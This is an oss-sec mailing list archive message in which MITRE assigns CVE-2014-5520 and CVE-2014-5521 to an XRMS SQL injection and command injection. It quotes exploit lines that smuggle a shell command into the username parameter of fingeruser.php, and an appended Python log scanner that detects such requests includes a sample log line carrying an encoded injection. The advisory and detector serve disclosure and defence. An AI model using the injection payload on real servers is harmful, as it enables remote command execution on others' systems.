oss-sec mailing list archives

Re: XRMS SQLi to RCE 0day


From: cve-assign () mitre org
Date: Fri, 29 Aug 2014 05:06:01 -0400 (EDT)


> We get SQL injection via $_SESSION poisoning

Use CVE-2014-5520.


> exploit a trivial command injection
> cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
> url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd

Use CVE-2014-5521.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
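
An added detection example, not part of the original message or of XRMS: it scans web access log lines for requests to the fingeruser.php endpoint quoted above whose username parameter falls outside a conservative allow-list. The combined log format, the /xrms/ install prefix, the allow-list pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter named in the quoted post.
TARGET_PATH = "/plugins/useradmin/fingeruser.php"
PARAM = "username"
# Assumption: legitimate usernames stay within this conservative character set.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_usernames(log_line):
    """Return decoded username values that fall outside the allow-list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(TARGET_PATH):
        return []
    hits = []
    # parse_qsl splits on the first '=' and then percent-decodes the value,
    # so an encoded ';' or quote shows up here in clear text.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM and not SAFE_USERNAME.fullmatch(value):
            hits.append(value)
    return hits

def scan(lines):
    """Yield (line_number, client_ip, value) for every flagged request."""
    for n, line in enumerate(lines, 1):
        for value in suspicious_usernames(line):
            yield n, line.split(" ", 1)[0], value

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Aug/2014:09:00:01 +0000] "GET /xrms/plugins/useradmin/fingeruser.php?username=jsmith HTTP/1.1" 200 512',
    '198.51.100.7 - - [29/Aug/2014:09:00:05 +0000] "GET /xrms/plugins/useradmin/fingeruser.php?username=%3B+echo+%270x41%27%3Bid%3Becho+%2714x0%27%3B=None HTTP/1.1" 200 734',
    '192.0.2.10 - - [29/Aug/2014:09:00:09 +0000] "GET /xrms/index.php?username=%3Bid HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for n, ip, value in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent username={value!r}")
```

Only the second sample line is flagged: the first carries an allow-listed username and the third targets a different path.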

